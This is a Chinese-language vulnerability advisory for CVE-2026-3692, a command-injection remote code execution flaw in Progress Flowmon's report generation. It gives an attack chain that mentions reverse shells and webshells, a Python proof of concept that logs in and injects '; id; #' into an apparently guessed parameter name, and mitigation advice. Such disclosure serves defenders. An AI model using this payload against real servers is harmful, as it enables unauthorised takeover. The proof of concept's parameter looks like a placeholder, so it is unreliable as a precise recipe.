CVE-2026-3692 CVSS 8.8 高危

CVE-2026-3692 Progress Flowmon 远程代码执行漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3692

漏洞类型

远程代码执行 (RCE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Progress Flowmon

漏洞概述

Progress Flowmon 12.5.8 之前的版本存在一处严重的安全漏洞。该漏洞允许经过身份验证的低权限用户在报告生成过程中精心构造特定的恶意请求，从而诱导服务器执行未预期的操作系统命令。由于漏洞利用无需用户交互，且攻击者仅需低权限即可发起，这使得攻击者能够通过网络远程控制服务器，对系统的机密性、完整性和可用性造成严重影响，可能导致敏感数据泄露或服务器被完全接管。

技术细节

该漏洞属于远程代码执行（RCE）漏洞，核心在于 Progress Flowmon 应用程序在处理报告生成逻辑时，未能对用户可控的参数进行充分的净化处理。具体而言，低权限攻击者可以利用应用程序接口中的参数注入点，拼接特定的 Shell 命令。当后端服务组合这些参数以生成系统级报告命令时，恶意命令会被一同传递给操作系统解释器执行。由于 CVSS 向量显示无需用户交互（UI:N）且攻击复杂度低（AC:L），攻击者一旦获得低权限账户凭证，即可通过自动化脚本批量利用此漏洞，导致服务器被完全控制，进而横向移动渗透内网环境。

攻击链分析

STEP 1

步骤1

攻击者利用获取的低权限账户凭证登录 Progress Flowmon 系统。

STEP 2

步骤2

攻击者分析报告生成接口，识别出未经过滤的参数点。

STEP 3

步骤3

攻击者构造包含恶意 shell 命令（如反弹 shell 或写入 webshell）的特殊 HTTP 请求。

STEP 4

步骤4

服务器端处理报告生成请求时，将恶意参数拼接到系统命令中并执行。

STEP 5

步骤5

恶意命令在服务器上运行，攻击者获得服务器控制权（RCE）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://<flowmon_ip>/api/report/generate"
username = "low_priv_user"
password = "password"

# 1. Authenticate to the application
session = requests.Session()
login_payload = {
    "username": username,
    "password": password
}
login_resp = session.post(f"https://<flowmon_ip>/login", data=login_payload)

if login_resp.status_code == 200:
    print("[+] Login successful")
    
    # 2. Craft the malicious payload for command injection
    # The vulnerability occurs in the report generation parameter
    # Example payload to execute 'id' command on the server
    malicious_param = "; id; #"
    
    exploit_data = {
        "report_template": "traffic_analysis",
        "output_format": "pdf",
        "vulnerable_parameter": malicious_param
    }
    
    # 3. Send the exploit request
    try:
        response = session.post(target_url, data=exploit_data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit request sent successfully")
            print("[+] Check server response for command output indicators")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")
else:
    print("[-] Login failed")

影响范围

Progress Flowmon < 12.5.8

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员暂时禁用受影响版本的报告生成功能，或仅允许通过 VPN 访问的受信任 IP 地址访问管理后台，以降低被攻击风险。同时应密切监控系统日志中是否存在异常的命令执行记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表